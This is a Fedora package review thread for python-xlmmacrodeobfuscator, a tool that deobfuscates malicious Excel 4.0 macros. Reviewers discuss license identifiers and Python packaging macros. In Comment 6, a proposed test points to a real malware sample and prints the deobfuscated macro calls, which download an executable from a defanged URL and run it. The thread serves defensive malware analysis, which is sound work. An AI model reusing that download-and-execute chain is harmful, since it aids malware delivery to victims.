Bug 2245786 - Review Request: python-xlmmacrodeobfuscator - XLM Emulation engine to deobfuscate malicious XLM macros, also known as Excel 4
Summary: Review Request: python-xlmmacrodeobfuscator - XLM Emulation engine to deobfus...
Keywords:
Status: NEW
Alias: None
Product: Fedora
Classification: Fedora
Component: Package Review
Version: rawhide
Hardware: Unspecified
OS: Unspecified
unspecified
unspecified
Target Milestone: ---
Assignee: Nobody's working on this, feel free to take it
QA Contact: Fedora Extras Quality Assurance
URL: https://github.com/DissectMalware/XLM...
Whiteboard: NotReady
Depends On: 2246454 2246704 2250689
Blocks: 1974565
TreeView+ depends on / blocked
 
Reported: 2023-10-24 07:31 UTC by Michal Ambroz
Modified: 2023-11-20 15:23 UTC (History)
2 users (show)

Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
Clone Of:
Environment:
Last Closed:
Type: ---
Embargoed:


Attachments (Terms of Use)

Description Michal Ambroz 2023-10-24 07:31:54 UTC
Spec URL: https://rebus.fedorapeople.org/python-xlmmacrodeobfuscator.spec
SRPM URL: https://rebus.fedorapeople.org/python-xlmmacrodeobfuscator-0.2.7-1.fc38.src.rpm

Description:
 XLMMacroDeobfuscator XLMMacroDeobfuscator can be used to decode obfuscated XLM
macros (also known as Excel 4.0 macros). It utilizes an internal XLM emulator
to interpret the macros, without fully performing the code.It supports both
xls, xlsm, and xlsb formats. It uses [xlrd2]( [pyxlsb2]( and its own parser to
extract cells and other information from xls, xlsb and xlsm files,
respectively.

Fedora Account System Username: rebus

Comment 1 Michal Ambroz 2023-10-24 07:31:57 UTC
This package built on koji:  https://koji.fedoraproject.org/koji/taskinfo?taskID=108021352

Comment 2 Aaron Rainbolt 2023-10-24 23:59:04 UTC
Unofficial and incomplete initial review of the spec file:

> License:        Apache License 2.0

This needs to use an SPDX identifier. See https://docs.fedoraproject.org/en-US/legal/license-field/

Also more often than not, a program isn't really under just one license, but oftentimes includes code from other projects under various other licenses. Any files that ultimately end up in the binary RPM in one form or another need to have their licenses listed here.

> %{?python_provide:%python_provide python%{python3_pkgversion}-xlmmacrodeobfuscator}

Can you replace this with %py_provides somehow? %python_provide was deprecated even in the 201x-era Python packaging guidelines (https://docs.fedoraproject.org/en-US/packaging-guidelines/Python_201x/), and those guidelines are now old and deprecated at this point, so %python_provide is like **really** deprecated now. See https://docs.fedoraproject.org/en-US/packaging-guidelines/Python/#_provides_and_requirements for how to use %py_provides.

> BuildRequires:  python%{python3_pkgversion}-devel

I think you need to spell out "python3-devel" here rather than using the macro. "Every package that uses Python (at runtime and/or build time) and/or installs Python modules MUST explicitly include BuildRequires: python3-devel in its .spec file, even if Python is not actually invoked during build time." (From https://docs.fedoraproject.org/en-US/packaging-guidelines/Python/#_distro_wide_guidelines)

Comment 3 Fedora Review Service 2023-10-25 02:33:50 UTC
Copr build:
https://copr.fedorainfracloud.org/coprs/build/6563210
(succeeded)

Review template:
https://download.copr.fedorainfracloud.org/results/@fedora-review/fedora-review-2245786-python-xlmmacrodeobfuscator/fedora-rawhide-x86_64/06563210-python-xlmmacrodeobfuscator/fedora-review/review.txt

Please take a look if any issues were found.

---
This comment was created by the fedora-review-service
https://github.com/FrostyX/fedora-review-service

If you want to trigger a new Copr build, add a comment containing new
Spec and SRPM URLs or [fedora-review-service-build] string.

Comment 4 Michal Ambroz 2023-10-26 15:59:02 UTC
> > License:        Apache License 2.0
changed from long to short SPDX identifier

> > %{?python_provide:%python_provide python%{python3_pkgversion}-xlmmacrodeobfuscator}
> > BuildRequires:  python%{python3_pkgversion}-devel
> I think you need to spell out "python3-devel" here rather than using the
I am planning to support the EPEL from RHEL7, on RHEL this macro translates the package name to python36-something
instead of just python3-something.
I noticed bigger problem ... I was actually missing the camelcasing which was the reason for explicitly adding that.

 
> Can you replace this with %py_provides somehow? %python_provide was
> deprecated even in the 201x-era Python packaging guidelines
Again something for EPEL package ... there is only python_provide on EPEL.
Lets make condition for that to be clear.


Spec URL: https://rebus.fedorapeople.org/python-xlmmacrodeobfuscator.spec
SRPM URL: https://rebus.fedorapeople.org/python-xlmmacrodeobfuscator-0.2.7-1.fc38.src.rpm

Comment 5 Fedora Review Service 2023-10-26 16:06:15 UTC
Copr build:
https://copr.fedorainfracloud.org/coprs/build/6567936
(succeeded)

Review template:
https://download.copr.fedorainfracloud.org/results/@fedora-review/fedora-review-2245786-python-xlmmacrodeobfuscator/fedora-rawhide-x86_64/06567936-python-xlmmacrodeobfuscator/fedora-review/review.txt

Please take a look if any issues were found.

---
This comment was created by the fedora-review-service
https://github.com/FrostyX/fedora-review-service

If you want to trigger a new Copr build, add a comment containing new
Spec and SRPM URLs or [fedora-review-service-build] string.

Comment 6 Michal Ambroz 2023-11-01 10:47:51 UTC
As this is really specific tool here I proposed test case to test that the tool does what it is supposed to do.
(BEWARE!!!) It is using real malware for test, so handle with care. Download of the second stage is not active now, but still I am de-fanging the malicious URL in the example bellow.

Test1 based on Dider Stevens diary https://isc.sans.edu/diary/Excel+4+Macro+Analysis+XLMMacroDeobfuscator/26110

1) download malware sample from Malshare (need to register)
https://malshare.com/sample.php?action=detail&hash=0be6ece31de89f3efb4125e086416ffc
https://malshare.com/sampleshare.php?action=getfile&hash=01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606

2) (OPTIONAL) check that it really contains the obfuscated code in the worksheet cells (using the DidierStevensSuite)
This step is optional as this particular sample IS obfuscated and was already publicly analyzed
$ zipdump.py -s 5 -d 01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606.xlsx |xmldump.py celltext| grep -e CALL
BC1986,"CALL($EB$661,$AE$429,$FK$1459,0,$BB$54,$CB$1256,0,0)",0
BC1987,"CALL($BO$1913,$GM$1203,$CF$742,0,$IO$1228,$GC$1642,,0,0)",0

3) check that the xlmdeobfuscator really gives the deobfuscated value
$ xlmdeobfuscator -f 01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606.xlsx | grep -e CALL
CELL:BC1986    , FullEvaluation      , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://service.pandtelectric[.]com/fattura.exe","C:\ProgramData\jeTneVi.exe",0,0)
CELL:BC1987    , FullEvaluation      , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\ProgramData\jeTneVi.exe",,0,0)


Note You need to log in before you can comment on or make changes to this bug.